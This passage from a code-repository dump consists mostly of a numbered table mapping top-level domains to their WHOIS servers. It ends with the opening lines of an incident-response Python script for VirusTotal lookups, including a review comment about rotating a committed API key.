| fyi:whois.donuts.co 1761 | gal:whois.gal.coreregistry.net 1762 | gallery:whois.donuts.co 1763 | gallo:whois.nic.gallo 1764 | gallup:whois.afilias-srs.net 1765 | game:whois.uniregistry.net 1766 | games:whois.rightside.co 1767 | garden:whois.nic.garden 1768 | gbiz:whois.nic.google 1769 | gd:whois.nic.gd 1770 | gdn:whois.nic.gdn 1771 | 
gea:whois.afilias-srs.net 1772 | gent:whois.nic.gent 1773 | genting:whois.nic.genting 1774 | george:whois.nic.george 1775 | gf:whois.mediaserv.net 1776 | gg:whois.gg 1777 | ggee:whois.nic.ggee 1778 | gi:whois2.afilias-grs.net 1779 | gift:whois.uniregistry.net 1780 | gifts:whois.donuts.co 1781 | gives:whois.rightside.co 1782 | giving:whois.nic.giving 1783 | gl:whois.nic.gl 1784 | glade:whois.nic.glade 1785 | glass:whois.donuts.co 1786 | gle:whois.nic.google 1787 | global:whois.nic.global 1788 | globo:whois.gtlds.nic.br 1789 | gmail:whois.nic.google 1790 | gmbh:whois.donuts.co 1791 | gmx:whois-fe1.gmx.tango.knipp.de 1792 | godaddy:whois.afilias-srs.net 1793 | gold:whois.donuts.co 1794 | goldpoint:whois.nic.goldpoint 1795 | golf:whois.donuts.co 1796 | goo:whois.nic.gmo 1797 | goodhands:whois.afilias-srs.net 1798 | goodyear:whois.afilias-srs.net 1799 | goog:whois.nic.google 1800 | google:whois.nic.google 1801 | gop:whois.nic.gop 1802 | gov:whois.dotgov.gov 1803 | gq:whois.dominio.gq 1804 | graphics:whois.donuts.co 1805 | gratis:whois.donuts.co 1806 | green:whois.afilias.net 1807 | gripe:whois.donuts.co 1808 | group:whois.donuts.co 1809 | gs:whois.nic.gs 1810 | guge:whois.nic.google 1811 | guide:whois.donuts.co 1812 | guitars:whois.uniregistry.net 1813 | guru:whois.donuts.co 1814 | gy:whois.registry.gy 1815 | hamburg:whois.nic.hamburg 1816 | hangout:whois.nic.google 1817 | haus:whois.unitedtld.com 1818 | hdfc:whois.afilias-srs.net 1819 | hdfcbank:whois.afilias-srs.net 1820 | healthcare:whois.donuts.co 1821 | help:whois.uniregistry.net 1822 | helsinki:whois.afilias-srs.net 1823 | here:whois.nic.google 1824 | hermes:whois.afilias-srs.net 1825 | hgtv:whois.nic.hgtv 1826 | hiphop:whois.uniregistry.net 1827 | hisamitsu:whois.nic.gmo 1828 | hitachi:whois.nic.gmo 1829 | hiv:whois.uniregistry.net 1830 | hk:whois.hkirc.hk 1831 | hkt:whois.afilias-srs.net 1832 | hm:whois.registry.hm 1833 | hn:whois.nic.hn 1834 | hockey:whois.donuts.co 1835 | holdings:whois.donuts.co 1836 | 
holiday:whois.donuts.co 1837 | homedepot:whois.afilias-srs.net 1838 | homes:whois.afilias-srs.net 1839 | honda:whois.nic.honda 1840 | horse:whois.nic.horse 1841 | hospital:whois.donuts.co 1842 | host:whois.nic.host 1843 | hosting:whois.uniregistry.net 1844 | house:whois.donuts.co 1845 | how:whois.nic.google 1846 | hr:whois.dns.hr 1847 | ht:whois.nic.ht 1848 | hu:whois.nic.hu 1849 | hughes:whois.afilias-srs.net 1850 | hyundai:whois.nic.hyundai 1851 | ibm:whois.nic.ibm 1852 | icbc:whois.afilias-srs.net 1853 | ice:whois.nic.ice 1854 | icu:whois.nic.icu 1855 | id:whois.pandi.or.id 1856 | ie:whois.domainregistry.ie 1857 | ifm:whois.nic.ifm 1858 | ikano:whois.ikano.tld-box.at 1859 | il:whois.isoc.org.il 1860 | im:whois.nic.im 1861 | imamat:whois.afilias-srs.net 1862 | immo:whois.donuts.co 1863 | immobilien:whois.unitedtld.com 1864 | in:whois.inregistry.net 1865 | industries:whois.donuts.co 1866 | infiniti:whois.nic.gmo 1867 | info:whois.afilias.net 1868 | ing:whois.nic.google 1869 | ink:whois.nic.ink 1870 | institute:whois.donuts.co 1871 | insurance:whois.nic.insurance 1872 | insure:whois.donuts.co 1873 | int:whois.iana.org 1874 | international:whois.donuts.co 1875 | investments:whois.donuts.co 1876 | io:whois.nic.io 1877 | iq:whois.cmc.iq 1878 | ir:whois.nic.ir 1879 | irish:whois.donuts.co 1880 | is:whois.isnic.is 1881 | iselect:whois.nic.iselect 1882 | ismaili:whois.afilias-srs.net 1883 | ist:whois.afilias-srs.net 1884 | istanbul:whois.afilias-srs.net 1885 | it:whois.nic.it 1886 | itv:whois.afilias-srs.net 1887 | iveco:whois.afilias-srs.net 1888 | jaguar:whois.nic.jaguar 1889 | java:whois.nic.java 1890 | jcb:whois.nic.gmo 1891 | jcp:whois.afilias-srs.net 1892 | je:whois.je 1893 | jeep:whois.afilias-srs.net 1894 | jewelry:whois.donuts.co 1895 | jio:whois.afilias-srs.net 1896 | jll:whois.afilias-srs.net 1897 | jobs:whois.nic.jobs 1898 | joburg:joburg-whois.registry.net.za 1899 | jp:whois.jprs.jp 1900 | juegos:whois.uniregistry.net 1901 | juniper:whois.nic.juniper 1902 | 
kaufen:whois.unitedtld.com 1903 | kddi:whois.nic.kddi 1904 | ke:whois.kenic.or.ke 1905 | kerryhotels:whois.nic.kerryhotels 1906 | kerrylogistics:whois.nic.kerrylogistics 1907 | kerryproperties:whois.nic.kerryproperties 1908 | kfh:whois.nic.kfh 1909 | kg:whois.kg 1910 | ki:whois.nic.ki 1911 | kia:whois.nic.kia 1912 | kim:whois.afilias.net 1913 | kitchen:whois.donuts.co 1914 | kiwi:whois.nic.kiwi 1915 | kn:whois.nic.kn 1916 | koeln:whois-fe1.pdt.koeln.tango.knipp.de 1917 | komatsu:whois.nic.komatsu 1918 | kosher:whois.afilias-srs.net 1919 | kr:whois.kr 1920 | krd:whois.aridnrs.net.au 1921 | kuokgroup:whois.nic.kuokgroup 1922 | ky:whois.kyregistry.ky 1923 | kyoto:whois.nic.kyoto 1924 | kz:whois.nic.kz 1925 | la:whois.nic.la 1926 | lacaixa:whois.nic.lacaixa 1927 | ladbrokes:whois.nic.ladbrokes 1928 | lamborghini:whois.afilias-srs.net 1929 | lamer:whois.afilias-srs.net 1930 | lancaster:whois-lancaster.nic.fr 1931 | lancia:whois.afilias-srs.net 1932 | lancome:whois.nic.lancome 1933 | land:whois.donuts.co 1934 | landrover:whois.nic.landrover 1935 | lasalle:whois.afilias-srs.net 1936 | lat:whois.nic.lat 1937 | latino:whois.afilias-srs.net 1938 | latrobe:whois.nic.latrobe 1939 | law:whois.nic.law 1940 | lawyer:whois.rightside.co 1941 | lds:whois.afilias-srs.net 1942 | lease:whois.donuts.co 1943 | leclerc:whois-leclerc.nic.fr 1944 | lefrak:whois.nic.lefrak 1945 | legal:whois.donuts.co 1946 | lego:whois.nic.lego 1947 | lexus:whois.nic.lexus 1948 | lgbt:whois.afilias.net 1949 | li:whois.nic.li 1950 | liaison:whois.nic.liaison 1951 | lidl:whois.nic.lidl 1952 | life:whois.donuts.co 1953 | lifestyle:whois.nic.lifestyle 1954 | lighting:whois.donuts.co 1955 | limited:whois.donuts.co 1956 | limo:whois.donuts.co 1957 | linde:whois.nic.linde 1958 | link:whois.uniregistry.net 1959 | lipsy:whois.nic.lipsy 1960 | live:whois.rightside.co 1961 | lixil:whois.nic.lixil 1962 | loan:whois.nic.loan 1963 | loans:whois.donuts.co 1964 | locker:whois.afilias-srs.net 1965 | locus:whois.nic.locus 
1966 | lol:whois.uniregistry.net 1967 | london:whois.nic.london 1968 | lotte:whois.nic.lotte 1969 | lotto:whois.afilias.net 1970 | love:whois.nic.love 1971 | lpl:whois.nic.lpl 1972 | lplfinancial:whois.nic.lplfinancial 1973 | lt:whois.domreg.lt 1974 | ltd:whois.donuts.co 1975 | ltda:whois.afilias-srs.net 1976 | lu:whois.dns.lu 1977 | lundbeck:whois.nic.lundbeck 1978 | luxe:whois.nic.luxe 1979 | luxury:whois.nic.luxury 1980 | lv:whois.nic.lv 1981 | ly:whois.nic.ly 1982 | ma:whois.registre.ma 1983 | macys:whois.nic.macys 1984 | madrid:whois.madrid.rs.corenic.net 1985 | maison:whois.donuts.co 1986 | makeup:whois.nic.makeup 1987 | man:whois.nic.man 1988 | management:whois.donuts.co 1989 | mango:whois.mango.coreregistry.net 1990 | market:whois.rightside.co 1991 | marketing:whois.donuts.co 1992 | markets:whois.nic.markets 1993 | marriott:whois.afilias-srs.net 1994 | maserati:whois.afilias-srs.net 1995 | mba:whois.donuts.co 1996 | mckinsey:whois.afilias-srs.net 1997 | md:whois.nic.md 1998 | me:whois.nic.me 1999 | med:whois.nic.med 2000 | media:whois.donuts.co 2001 | meet:whois.nic.google 2002 | melbourne:whois.aridnrs.net.au 2003 | meme:whois.nic.google 2004 | memorial:whois.donuts.co 2005 | men:whois.nic.men 2006 | menu:whois.nic.menu 2007 | metlife:whois.afilias-srs.net 2008 | mg:whois.nic.mg 2009 | miami:whois.nic.miami 2010 | mini:whois.ksregistry.net 2011 | mit:whois.afilias-srs.net 2012 | mitsubishi:whois.nic.gmo 2013 | mk:whois.marnet.mk 2014 | ml:whois.dot.ml 2015 | mls:whois.nic.mls 2016 | mma:whois-mma.nic.fr 2017 | mn:whois.nic.mn 2018 | mo:whois.monic.mo 2019 | mobi:whois.afilias.net 2020 | mobile:whois.afilias-srs.net 2021 | moda:whois.unitedtld.com 2022 | moe:whois.nic.moe 2023 | mom:whois.uniregistry.net 2024 | monash:whois.nic.monash 2025 | money:whois.donuts.co 2026 | monster:whois.afilias-srs.net 2027 | mopar:whois.afilias-srs.net 2028 | mormon:whois.afilias-srs.net 2029 | mortgage:whois.rightside.co 2030 | moscow:whois.nic.moscow 2031 | 
motorcycles:whois.afilias-srs.net 2032 | mov:whois.nic.google 2033 | movie:whois.donuts.co 2034 | movistar:whois-fe.movistar.tango.knipp.de 2035 | mp:whois.nic.mp 2036 | mq:whois.mediaserv.net 2037 | ms:whois.nic.ms 2038 | mtn:whois.nic.mtn 2039 | mtpc:whois.nic.gmo 2040 | mtr:whois.nic.mtr 2041 | mu:whois.nic.mu 2042 | museum:whois.museum 2043 | mx:whois.mx 2044 | my:whois.mynic.my 2045 | mz:whois.nic.mz 2046 | na:whois.na-nic.com.na 2047 | nab:whois.nic.nab 2048 | nadex:whois.nic.nadex 2049 | name:whois.nic.name 2050 | nationwide:whois.nic.nationwide 2051 | natura:whois.afilias-srs.net 2052 | navy:whois.rightside.co 2053 | nc:whois.nc 2054 | nec:whois.nic.nec 2055 | net:whois.verisign-grs.com 2056 | netbank:whois.nic.netbank 2057 | network:whois.donuts.co 2058 | new:whois.nic.google 2059 | newholland:whois.afilias-srs.net 2060 | news:whois.rightside.co 2061 | next:whois.nic.next 2062 | nextdirect:whois.nic.nextdirect 2063 | nexus:whois.nic.google 2064 | nf:whois.nic.nf 2065 | ng:whois.nic.net.ng 2066 | ngo:whois.publicinterestregistry.net 2067 | nico:whois.nic.nico 2068 | nikon:whois.nic.nikon 2069 | ninja:whois.unitedtld.com 2070 | nissan:whois.nic.gmo 2071 | nissay:whois.nic.nissay 2072 | nl:whois.domain-registry.nl 2073 | no:whois.norid.no 2074 | nokia:whois.afilias-srs.net 2075 | norton:whois.nic.norton 2076 | nowruz:whois.agitsys.net 2077 | nowtv:whois.afilias-srs.net 2078 | nra:whois.afilias-srs.net 2079 | nrw:whois.nic.nrw 2080 | nu:whois.iis.nu 2081 | nz:whois.srs.net.nz 2082 | obi:whois.nic.obi 2083 | observer:whois.nic.observer 2084 | off:whois.nic.off 2085 | olayan:whois.nic.olayan 2086 | olayangroup:whois.nic.olayangroup 2087 | ollo:whois.afilias-srs.net 2088 | om:whois.registry.om 2089 | omega:whois.nic.omega 2090 | one:whois.nic.one 2091 | ong:whois.publicinterestregistry.net 2092 | onl:whois.afilias-srs.net 2093 | online:whois.nic.online 2094 | onyourside:whois.nic.onyourside 2095 | ooo:whois.nic.ooo 2096 | oracle:whois.nic.oracle 2097 | 
orange:whois.nic.orange 2098 | org:whois.pir.org 2099 | organic:whois.afilias.net 2100 | orientexpress:whois.afilias-srs.net 2101 | origins:whois.afilias-srs.net 2102 | osaka:whois.nic.osaka 2103 | ott:whois.afilias-srs.net 2104 | ovh:whois-ovh.nic.fr 2105 | page:whois.nic.google 2106 | panasonic:whois.nic.gmo 2107 | paris:whois-paris.nic.fr 2108 | pars:whois.agitsys.net 2109 | partners:whois.donuts.co 2110 | parts:whois.donuts.co 2111 | party:whois.nic.party 2112 | pccw:whois.afilias-srs.net 2113 | pe:kero.yachay.pe 2114 | pet:whois.afilias.net 2115 | pf:whois.registry.pf 2116 | philips:whois.nic.philips 2117 | phone:whois.afilias-srs.net 2118 | photo:whois.uniregistry.net 2119 | photography:whois.donuts.co 2120 | photos:whois.donuts.co 2121 | physio:whois.nic.physio 2122 | pics:whois.uniregistry.net 2123 | pictures:whois.donuts.co 2124 | pid:whois.nic.pid 2125 | pink:whois.afilias.net 2126 | pioneer:whois.nic.gmo 2127 | pizza:whois.donuts.co 2128 | pl:whois.dns.pl 2129 | place:whois.donuts.co 2130 | play:whois.nic.google 2131 | playstation:whois.nic.playstation 2132 | plumbing:whois.donuts.co 2133 | plus:whois.donuts.co 2134 | pm:whois.nic.pm 2135 | pnc:whois.afilias-srs.net 2136 | pohl:whois.ksregistry.net 2137 | poker:whois.afilias.net 2138 | politie:whois.nic.politie 2139 | porn:whois.afilias-srs.net 2140 | post:whois.dotpostregistry.net 2141 | pr:whois.nic.pr 2142 | press:whois.nic.press 2143 | pro:whois.afilias.net 2144 | prod:whois.nic.google 2145 | productions:whois.donuts.co 2146 | prof:whois.nic.google 2147 | progressive:whois.afilias-srs.net 2148 | promo:whois.afilias.net 2149 | properties:whois.donuts.co 2150 | property:whois.uniregistry.net 2151 | protection:whois.nic.protection 2152 | pt:whois.dns.pt 2153 | pub:whois.unitedtld.com 2154 | pw:whois.nic.pw 2155 | pwc:whois.afilias-srs.net 2156 | qa:whois.registry.qa 2157 | quebec:whois.nic.quebec 2158 | quest:whois.nic.quest 2159 | racing:whois.nic.racing 2160 | radio:whois.nic.radio 2161 | 
raid:whois.nic.raid 2162 | re:whois.nic.re 2163 | realestate:whois.nic.realestate 2164 | realty:whois.nic.realty 2165 | recipes:whois.donuts.co 2166 | red:whois.afilias.net 2167 | redstone:whois.nic.redstone 2168 | redumbrella:whois.afilias-srs.net 2169 | rehab:whois.rightside.co 2170 | reise:whois.nic.reise 2171 | reisen:whois.donuts.co 2172 | reit:whois.nic.reit 2173 | reliance:whois.afilias-srs.net 2174 | rent:whois.nic.rent 2175 | rentals:whois.donuts.co 2176 | repair:whois.donuts.co 2177 | report:whois.donuts.co 2178 | republican:whois.rightside.co 2179 | rest:whois.nic.rest 2180 | restaurant:whois.donuts.co 2181 | review:whois.nic.review 2182 | reviews:whois.unitedtld.com 2183 | rexroth:whois.nic.rexroth 2184 | rich:whois.afilias-srs.net 2185 | richardli:whois.afilias-srs.net 2186 | ricoh:whois.nic.ricoh 2187 | rightathome:whois.nic.rightathome 2188 | ril:whois.afilias-srs.net 2189 | rio:whois.gtlds.nic.br 2190 | rip:whois.rightside.co 2191 | rmit:whois.aridnrs.net.au 2192 | ro:whois.rotld.ro 2193 | rocks:whois.unitedtld.com 2194 | rodeo:whois.nic.rodeo 2195 | rogers:whois.afilias-srs.net 2196 | rs:whois.rnids.rs 2197 | rsvp:whois.nic.google 2198 | ru:whois.tcinet.ru 2199 | rugby:whois.centralnic.com 2200 | ruhr:whois.nic.ruhr 2201 | run:whois.donuts.co 2202 | rwe:whois.nic.rwe 2203 | sa:whois.nic.net.sa 2204 | saarland:whois.ksregistry.net 2205 | sale:whois.rightside.co 2206 | salon:whois.donuts.co 2207 | samsclub:whois.nic.samsclub 2208 | samsung:whois.nic.samsung 2209 | sandvik:whois.nic.sandvik 2210 | sandvikcoromant:whois.nic.sandvikcoromant 2211 | sanofi:whois.nic.sanofi 2212 | sap:whois.nic.sap 2213 | sarl:whois.donuts.co 2214 | saxo:whois.aridnrs.net.au 2215 | sb:whois.nic.net.sb 2216 | sbi:whois.afilias-srs.net 2217 | sbs:whois.nic.sbs 2218 | sc:whois2.afilias-grs.net 2219 | sca:whois.nic.sca 2220 | scb:whois.nic.scb 2221 | schaeffler:whois.afilias-srs.net 2222 | schmidt:whois.nic.schmidt 2223 | scholarships:whois.afilias-srs.net 2224 | 
school:whois.donuts.co 2225 | schule:whois.donuts.co 2226 | schwarz:whois.nic.schwarz 2227 | science:whois.nic.science 2228 | scjohnson:whois.nic.scjohnson 2229 | scor:whois.nic.scor 2230 | scot:whois.scot.coreregistry.net 2231 | se:whois.iis.se 2232 | seat:whois.nic.seat 2233 | security:whois.nic.security 2234 | seek:whois.nic.seek 2235 | select:whois.nic.select 2236 | services:whois.donuts.co 2237 | ses:whois.nic.ses 2238 | seven:whois.nic.seven 2239 | sew:whois.afilias-srs.net 2240 | sex:whois.afilias-srs.net 2241 | sexy:whois.uniregistry.net 2242 | sfr:whois.nic.sfr 2243 | sg:whois.sgnic.sg 2244 | sh:whois.nic.sh 2245 | shangrila:whois.nic.shangrila 2246 | sharp:whois.nic.gmo 2247 | shaw:whois.afilias-srs.net 2248 | shell:whois.nic.shell 2249 | shia:whois.agitsys.net 2250 | shiksha:whois.afilias.net 2251 | shoes:whois.donuts.co 2252 | shopping:whois.donuts.co 2253 | shouji:whois.teleinfo.cn 2254 | show:whois.donuts.co 2255 | showtime:whois.afilias-srs.net 2256 | shriram:whois.afilias-srs.net 2257 | si:whois.register.si 2258 | sina:whois.afilias-srs.net 2259 | singles:whois.donuts.co 2260 | site:whois.nic.site 2261 | sk:whois.sk-nic.sk 2262 | ski:whois.afilias.net 2263 | skin:whois.nic.skin 2264 | sky:whois.nic.sky 2265 | sling:whois.afilias-srs.net 2266 | sm:whois.nic.sm 2267 | smart:whois-gtld.smart.com.ph 2268 | sn:whois.nic.sn 2269 | sncf:whois-sncf.nic.fr 2270 | so:whois.nic.so 2271 | soccer:whois.donuts.co 2272 | social:whois.unitedtld.com 2273 | softbank:whois.nic.softbank 2274 | software:whois.rightside.co 2275 | solar:whois.donuts.co 2276 | solutions:whois.donuts.co 2277 | sony:whois.nic.sony 2278 | soy:whois.nic.google 2279 | space:whois.nic.space 2280 | spiegel:whois.ksregistry.net 2281 | spreadbetting:whois.nic.spreadbetting 2282 | srl:whois.afilias-srs.net 2283 | srt:whois.afilias-srs.net 2284 | st:whois.nic.st 2285 | stada:whois.afilias-srs.net 2286 | star:whois.afilias-srs.net 2287 | starhub:whois.nic.starhub 2288 | statebank:whois.afilias-srs.net 
2289 | statoil:whois.nic.statoil 2290 | stc:whois.nic.stc 2291 | stcgroup:whois.nic.stcgroup 2292 | stockholm:whois.afilias-srs.net 2293 | storage:whois.afilias-srs.net 2294 | store:whois.nic.store 2295 | studio:whois.rightside.co 2296 | study:whois.nic.study 2297 | style:whois.donuts.co 2298 | su:whois.tcinet.ru 2299 | sucks:whois.nic.sucks 2300 | supplies:whois.donuts.co 2301 | supply:whois.donuts.co 2302 | support:whois.donuts.co 2303 | surf:whois.nic.surf 2304 | surgery:whois.donuts.co 2305 | swatch:whois.nic.swatch 2306 | swiss:whois.nic.swiss 2307 | sx:whois.sx 2308 | sy:whois.tld.sy 2309 | sydney:whois.nic.sydney 2310 | symantec:whois.nic.symantec 2311 | systems:whois.donuts.co 2312 | tab:whois.nic.tab 2313 | taipei:whois.nic.taipei 2314 | tatamotors:whois.nic.tatamotors 2315 | tatar:whois.nic.tatar 2316 | tattoo:whois.uniregistry.net 2317 | tax:whois.donuts.co 2318 | taxi:whois.donuts.co 2319 | tc:whois.nic.tc 2320 | tci:whois.agitsys.net 2321 | tdk:whois.nic.tdk 2322 | team:whois.donuts.co 2323 | tech:whois.nic.tech 2324 | technology:whois.donuts.co 2325 | tel:whois.nic.tel 2326 | telecity:whois.nic.telecity 2327 | telefonica:whois-fe.telefonica.tango.knipp.de 2328 | temasek:whois.afilias-srs.net 2329 | tennis:whois.donuts.co 2330 | teva:whois.nic.teva 2331 | tf:whois.nic.tf 2332 | tg:whois.nic.tg 2333 | th:whois.thnic.co.th 2334 | thd:whois.afilias-srs.net 2335 | theater:whois.donuts.co 2336 | theatre:whois.nic.theatre 2337 | tiaa:whois.nic.tiaa 2338 | tickets:whois.nic.tickets 2339 | tienda:whois.donuts.co 2340 | tiffany:whois.nic.tiffany 2341 | tips:whois.donuts.co 2342 | tires:whois.donuts.co 2343 | tirol:whois.nic.tirol 2344 | tk:whois.dot.tk 2345 | tl:whois.nic.tl 2346 | tm:whois.nic.tm 2347 | tn:whois.ati.tn 2348 | to:whois.tonic.to 2349 | today:whois.donuts.co 2350 | tools:whois.donuts.co 2351 | top:whois.nic.top 2352 | toray:whois.nic.toray 2353 | toshiba:whois.nic.toshiba 2354 | total:whois-total.nic.fr 2355 | tours:whois.donuts.co 2356 | 
town:whois.donuts.co 2357 | toyota:whois.nic.toyota 2358 | toys:whois.donuts.co 2359 | tr:whois.nic.tr 2360 | trade:whois.nic.trade 2361 | trading:whois.nic.trading 2362 | training:whois.donuts.co 2363 | travel:whois.nic.travel 2364 | travelchannel:whois.nic.travelchannel 2365 | travelers:whois.afilias-srs.net 2366 | travelersinsurance:whois.afilias-srs.net 2367 | trust:whois.nic.trust 2368 | trv:whois.afilias-srs.net 2369 | tui:whois.ksregistry.net 2370 | tv:tvwhois.verisign-grs.com 2371 | tvs:whois.afilias-srs.net 2372 | tw:whois.twnic.net.tw 2373 | tz:whois.tznic.or.tz 2374 | ua:whois.ua 2375 | ubank:whois.nic.ubank 2376 | ubs:whois.nic.ubs 2377 | uconnect:whois.afilias-srs.net 2378 | ug:whois.co.ug 2379 | uk:whois.nic.uk 2380 | university:whois.donuts.co 2381 | uol:whois.gtlds.nic.br 2382 | ups:whois.afilias-srs.net 2383 | us:whois.nic.us 2384 | uy:whois.nic.org.uy 2385 | uz:whois.cctld.uz 2386 | vacations:whois.donuts.co 2387 | vana:whois.nic.vana 2388 | vanguard:whois.nic.vanguard 2389 | vc:whois2.afilias-grs.net 2390 | ve:whois.nic.ve 2391 | vegas:whois.afilias-srs.net 2392 | ventures:whois.donuts.co 2393 | verisign:whois.nic.verisign 2394 | vermögensberater:whois.ksregistry.net 2395 | vermögensberatung:whois.ksregistry.net 2396 | versicherung:whois.nic.versicherung 2397 | vet:whois.rightside.co 2398 | vg:whois.nic.vg 2399 | viajes:whois.donuts.co 2400 | video:whois.rightside.co 2401 | vig:whois.afilias-srs.net 2402 | viking:whois.afilias-srs.net 2403 | villas:whois.donuts.co 2404 | vin:whois.donuts.co 2405 | vip:whois.nic.vip 2406 | virgin:whois.nic.virgin 2407 | visa:whois.nic.visa 2408 | vision:whois.donuts.co 2409 | vista:whois.nic.vista 2410 | vistaprint:whois.nic.vistaprint 2411 | viva:whois.nic.viva 2412 | vlaanderen:whois.nic.vlaanderen 2413 | vodka:whois.nic.vodka 2414 | volkswagen:whois.afilias-srs.net 2415 | volvo:whois.nic.volvo 2416 | vote:whois.afilias.net 2417 | voting:whois.voting.tld-box.at 2418 | voto:whois.afilias.net 2419 | 
voyage:whois.donuts.co 2420 | vu:vunic.vu 2421 | wales:whois.nic.wales 2422 | walmart:whois.nic.walmart 2423 | walter:whois.nic.walter 2424 | wang:whois.gtld.knet.cn 2425 | warman:whois.nic.warman 2426 | watch:whois.donuts.co 2427 | webcam:whois.nic.webcam 2428 | weber:whois.nic.weber 2429 | website:whois.nic.website 2430 | wed:whois.nic.wed 2431 | wedding:whois.nic.wedding 2432 | weibo:whois.afilias-srs.net 2433 | wf:whois.nic.wf 2434 | whoswho:whois.nic.whoswho 2435 | wien:whois.nic.wien 2436 | wiki:whois.nic.wiki 2437 | win:whois.nic.win 2438 | wine:whois.donuts.co 2439 | wme:whois.nic.wme 2440 | wolterskluwer:whois.afilias-srs.net 2441 | woodside:whois.nic.woodside 2442 | work:whois.nic.work 2443 | works:whois.donuts.co 2444 | world:whois.donuts.co 2445 | ws:whois.website.ws 2446 | wtc:whois.nic.wtc 2447 | wtf:whois.donuts.co 2448 | xerox:whois.nic.xerox 2449 | xfinity:whois.nic.xfinity 2450 | xihuan:whois.teleinfo.cn 2451 | xin:whois.nic.xin 2452 | xperia:whois.nic.xperia 2453 | xxx:whois.nic.xxx 2454 | xyz:whois.nic.xyz 2455 | yachts:whois.afilias-srs.net 2456 | yodobashi:whois.nic.gmo 2457 | yoga:whois.nic.yoga 2458 | youtube:whois.nic.google 2459 | yt:whois.nic.yt 2460 | yun:whois.teleinfo.cn 2461 | zara:whois.afilias-srs.net 2462 | zip:whois.nic.google 2463 | zm:whois.nic.zm 2464 | zone:whois.donuts.co 2465 | zuerich:whois.ksregistry.net 2466 | бг:whois.imena.bg 2467 | бел:whois.cctld.by 2468 | дети:whois.nic.xn--d1acj3b 2469 | ею:whois.eu 2470 | католик:whois.aridnrs.net.au 2471 | ком:whois.nic.xn--j1aef 2472 | мкд:whois.marnet.mk 2473 | москва:whois.nic.xn--80adxhks 2474 | онлайн:whois.online.rs.corenic.net 2475 | орг:whois.publicinterestregistry.net 2476 | рус:whois.nic.xn--p1acf 2477 | рф:whois.tcinet.ru 2478 | сайт:whois.site.rs.corenic.net 2479 | срб:whois.rnids.rs 2480 | укр:whois.dotukr.com 2481 | қаз:whois.nic.kz 2482 | հայ:whois.amnic.net 2483 | कॉम:whois.nic.xn--11b4c3d 2484 | नेट:whois.nic.xn--c2br7g 2485 | 
संगठन:whois.publicinterestregistry.net 2486 | சிங்கப்பூர்:whois.sgnic.sg 2487 | คอม:whois.nic.xn--42c2d9a 2488 | ไทย:whois.thnic.co.th 2489 | გე:whois.itdc.ge 2490 | ‏.קום‎:whois.nic.xn--9dbq2a 2491 | ‏.ابوظبي‎:whois.nic.xn--mgbca7dzdo 2492 | ‏.الجزائر‎:whois.nic.dz 2493 | ‏.السعودية‎:whois.nic.net.sa 2494 | ‏.العليان‎:whois.nic.xn--mgba7c0bbn0a 2495 | ‏.امارات‎:whois.aeda.net.ae 2496 | ‏.ایران‎:whois.nic.ir 2497 | ‏.بازار‎:whois.bazaar.coreregistry.net 2498 | ‏.بيتك‎:whois.nic.xn--ngbe9e0a 2499 | ‏.سورية‎:whois.tld.sy 2500 | ‏.شبكة‎:whois.nic.xn--ngbc5azd 2501 | ‏.عراق‎:whois.cmc.iq 2502 | ‏.عمان‎:whois.registry.om 2503 | ‏.فلسطين‎:whois.pnina.ps 2504 | ‏.قطر‎:whois.registry.qa 2505 | ‏.كاثوليك‎:whois.aridnrs.net.au 2506 | ‏.كوم‎:whois.nic.xn--fhbei 2507 | ‏.مليسيا‎:whois.mynic.my 2508 | ‏.موقع‎:whois.afilias-srs.net 2509 | ‏.همراه‎:whois.agitsys.net 2510 | みんな:whois.nic.google 2511 | グーグル:whois.nic.google 2512 | コム:whois.nic.xn--tckwe 2513 | 中信:whois.gtld.knet.cn 2514 | 中国:cwhois.cnnic.cn 2515 | 中國:cwhois.cnnic.cn 2516 | 中文网:whois.teleinfo.cn 2517 | 企业:whois.donuts.co 2518 | 佛山:whois.ngtld.cn 2519 | 信息:whois.teleinfo.cn 2520 | 八卦:whois.nic.xn--45q11c 2521 | 公司:whois.ngtld.cn 2522 | 公益:whois.conac.cn 2523 | 台湾:whois.twnic.net.tw 2524 | 台灣:whois.twnic.net.tw 2525 | 商城:whois.gtld.knet.cn 2526 | 商店:whois.donuts.co 2527 | 嘉里:whois.nic.xn--w4rs40l 2528 | 嘉里大酒店:whois.nic.xn--w4r85el8fhu5dnra 2529 | 在线:whois.teleinfo.cn 2530 | 大众汽车:whois.afilias-srs.net 2531 | 大拿:whois.nic.xn--pssy2u 2532 | 天主教:whois.aridnrs.net.au 2533 | 娱乐:whois.donuts.co 2534 | 工行:whois.afilias-srs.net 2535 | 广东:whois.ngtld.cn 2536 | 微博:whois.afilias-srs.net 2537 | 慈善:whois.gtld.knet.cn 2538 | 我爱你:whois.gtld.knet.cn 2539 | 手机:whois.nic.xn--kput3i 2540 | 政务:whois.conac.cn 2541 | 政府:whois.nic.xn--mxtq1m 2542 | 新加坡:whois.sgnic.sg 2543 | 新闻:whois.nic.xn--efvy88h 2544 | 时尚:whois.gtld.knet.cn 2545 | 机构:whois.publicinterestregistry.net 2546 | 淡马锡:whois.afilias-srs.net 2547 | 游戏:whois.donuts.co 2548 | 
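澳門:whois.monic.mo 2549 | 点看:whois.nic.xn--3pxu8k 2550 | 移动:whois.afilias.net 2551 | 组织机构:whois.publicinterestregistry.net 2552 | 网址:whois.registry.knet.cn 2553 | 网店:whois.nic.xn--hxt814e 2554 | 网站:whois.afilias-srs.net 2555 | 网络:whois.ngtld.cn 2556 | 诺基亚:whois.afilias-srs.net 2557 | 谷歌:whois.nic.google 2558 | 集团:whois.gtld.knet.cn 2559 | 電訊盈科:whois.afilias-srs.net 2560 | 飞利浦:whois.nic.xn--kcrx77d1x4a 2561 | 香格里拉:whois.nic.xn--5su34j936bgsg 2562 | 香港:whois.hkirc.hk 2563 | 닷넷:whois.nic.xn--t60b56a 2564 | 닷컴:whois.nic.xn--mk1bu44c 2565 | 삼성:whois.kr 2566 | 한국:whois.kr 2567 |
--------------------------------------------------------------------------------
/Emergency/Linux/virustotal.py:
--------------------------------------------------------------------------------
# -*- coding:utf-8 -*-

'''
Threat-intelligence lookups against VirusTotal for the files, domains,
IP addresses and URLs that need checking during incident response.
'''


# Packages, libraries and modules this script depends on (Python 2).
import os
import sys
import json
import urllib
import base64
import urllib2
import hashlib
import datetime
import postfile
import simplejson
from optparse import OptionParser


# API credential, stored as base64 of "<apikey>+<username>".
# NOTE(review): the default below is a credential committed to the repository.
# Base64 is an encoding, not protection: anyone who can read the source can
# decode it. Treat the key as disclosed, rotate it, and supply the replacement
# through the VT_APIKEY_B64 environment variable instead of editing this file.
APIKEY = os.environ.get(
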